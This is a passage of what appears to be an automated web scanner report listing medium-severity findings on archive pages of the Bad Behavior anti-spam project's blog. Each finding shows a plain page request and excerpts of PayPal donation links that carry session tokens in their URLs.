</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And I wouldn&#8217;t mind if you want to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute that last $10</a>
...[SNIP]...

5.10. http://bad-behavior.ioerror.us/2005/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/12/

Request

GET /2005/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762137+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O5kMZUEHICsdbBg6fYS5mr94uluFYnNfP3q1vK1qSzaVatVzkC0kvAa-ZLa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Remember, Bad Behavior is a user-driven project. If you feel that Bad Behavior has been useful to you and want to support its continued development, feel free to send along your <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">holiday wishes</a>. Yes, I know &#8217;tis the season to max out the credit cards. Still, providing you with software that worries about spam so you don&#8217;t have to is what I do. And without <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">your support</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vV5UNoosXB63kLsoPOVZrDWmRfdWZlYoYMGVaWZu1sFGfMLn7c-oaH3P2ze&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>So if you&#8217;re interested in seeing a noncommercial Akismet replacement service, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=SGbfazrHOekCOEDoqaE51BQFocFboqDmiPHJXccY2SZ4hHrIC4lTjA0Uf3i&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">click here</a>
...[SNIP]...
<p>Anyway, I&#8217;m preparing to spend most of the weekend working on Bad Behavior. Feel free to leave your comments below. <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vV5UNoosXB63kLsoPOVZrDWmRfdWZlYoYMGVaWZu1sFGfMLn7c-oaH3P2ze&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">Nice holiday wishes</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.11. http://bad-behavior.ioerror.us/2006/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/02/

Request

GET /2006/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762134+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>A representative from a major open source project informed me that the project would be willing to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute financially</a>
...[SNIP]...
<p>If you think this roadmap looks good, and want to accelerate the development of Bad Behavior, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9234nVV46pX_DspSKaDd0n0l0uzfngPCqJiBsx9qjiIY3WY0t7lSvi6inFq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute financially</a>
...[SNIP]...

5.12. http://bad-behavior.ioerror.us/2006/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/04/

Request

GET /2006/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762129+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 33391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FAc_AWrNLDvDwFWW5ToqC6Id1_ab8HT_qpQw8Nx8RRUgoKRgoe3HwCW9MJ4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FAc_AWrNLDvDwFWW5ToqC6Id1_ab8HT_qpQw8Nx8RRUgoKRgoe3HwCW9MJ4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=RXaeFgvQxJr97iSGnAzIWZqBWatF-JLMYkE2jzBJBF7qSSnWGQHHh3TUb-u&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.13. http://bad-behavior.ioerror.us/2006/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/06/

Request

GET /2006/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762124+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3gxWNXKQCj-uKEvazLSQMfBpAty34sqlxqClGqzis7iSP66E8TKCr2o-f_i&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3gxWNXKQCj-uKEvazLSQMfBpAty34sqlxqClGqzis7iSP66E8TKCr2o-f_i&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.14. http://bad-behavior.ioerror.us/2006/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/07/

Request

GET /2006/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762124+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 52882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ACf1pAEEuOec-mg5x3Al9iKWoJfgx2HofQTBYoYBB-sI53r3_bCbRWwzaOa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ACf1pAEEuOec-mg5x3Al9iKWoJfgx2HofQTBYoYBB-sI53r3_bCbRWwzaOa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=hT6NeSH3Bvc7ef-pgZLPL6IMW11fkq1e4aYNxJBRwaJ3MpFrQHb-HDxJo8q&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Before I get into the release announcement, I just want to ask all of you to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=DsneidDZRM7YCqQbgpeRCi_g06eFtZ96jVRNOA4muBESGigHG_iBV1h8HzS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">send me money</a>
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=hT6NeSH3Bvc7ef-pgZLPL6IMW11fkq1e4aYNxJBRwaJ3MpFrQHb-HDxJo8q&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V7m71K6vG1v9ZIX96o4LS33Kkyuzti0CM-kR-Y3Nix9eSeuwDLy7NjBosz8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V7m71K6vG1v9ZIX96o4LS33Kkyuzti0CM-kR-Y3Nix9eSeuwDLy7NjBosz8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
<img src='http://bad-behavior.ioerror.us/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Okay, you can&#8217;t do that online, so consider dropping off <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V2JwYuasg76xV7CzrIo1XoGVp2Silxk_vnOQ74eqqFV5LWclWvoXuEjJpDG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">$5.00</a> or <a href="https://www.paypal.com/uk/cgi-bin/webscr?cmd=_flow&amp;SESSION=8dDTo_9l0-gRQX5dD8iWbs3vnPLIdO7SdNJo1_WEAhXiyCDypUSKpSU3mV4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">&pound;3.00</a> or <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YHdxtAmrnCdELTzpSSuENXQUcHzasCW2h-e5Znlp4kKTslhhOvLZqkQhCbm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">&euro;4,25</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1DwLg5XtP55UVCR7PlAkyXK-rjrsQyJbHZgy410xNAfMaIcq3Vo657C4MPa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.15. http://bad-behavior.ioerror.us/2006/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/08/

Request

GET /2006/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=c1D8xeZGF47DnQBhM-A8x-CaRi2jszyC1Ft6V2scXqstrV6JHOK_srv4GLG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
ou&#8217;d like to get your hands on this code early, I am offering a pre-release package to anyone who has previously contributed financially at least $5.00 to Bad Behavior development (or anyone who <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=c1D8xeZGF47DnQBhM-A8x-CaRi2jszyC1Ft6V2scXqstrV6JHOK_srv4GLG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contributes now</a>
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=XvNsBya35S4lqUfPKW4sJ1lv2zNkl30mWmVQVA443kIxFKwYSFkDqRYg29K&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>You can also help by <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=XvNsBya35S4lqUfPKW4sJ1lv2zNkl30mWmVQVA443kIxFKwYSFkDqRYg29K&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=z78SMJXy0RjExwIdpf6faDfTANdBGkovEwEQ58eAU0cJkqb9HsqeblLceQm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=z78SMJXy0RjExwIdpf6faDfTANdBGkovEwEQ58eAU0cJkqb9HsqeblLceQm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.16. http://bad-behavior.ioerror.us/2006/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/09/

Request

GET /2006/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 26879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
e been delaying it due to lack of time. And this is where you come in. I work on Bad Behavior and related projects primarily as I have time, and I can afford to devote more time to it when more people <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=IgQzR-qOVEyD0UokcrGaJEJDQgaOqocz2WqxzQVfuCw-Wnu83Kz06Om5SYS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute</a>
...[SNIP]...
<p>If you&#8217;d like to see this project completed sooner than later, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=IgQzR-qOVEyD0UokcrGaJEJDQgaOqocz2WqxzQVfuCw-Wnu83Kz06Om5SYS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=T11ksg16NmlhxRKFNrO2Chcgt7ay3MzCfq4F9YeM6l0lozd_mCC99WGFPMa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=T11ksg16NmlhxRKFNrO2Chcgt7ay3MzCfq4F9YeM6l0lozd_mCC99WGFPMa&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.17. http://bad-behavior.ioerror.us/2006/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/11/

Request

GET /2006/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 18338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<p>If you find Bad Behavior valuable, and you want to see this project up and running sooner rather than later, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=g5ftosJDmIbAe87FArhV3QzVYE2dG65AUqbCrbFoBdPFggQnn0SgUYB1trW&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute</a>
...[SNIP]...
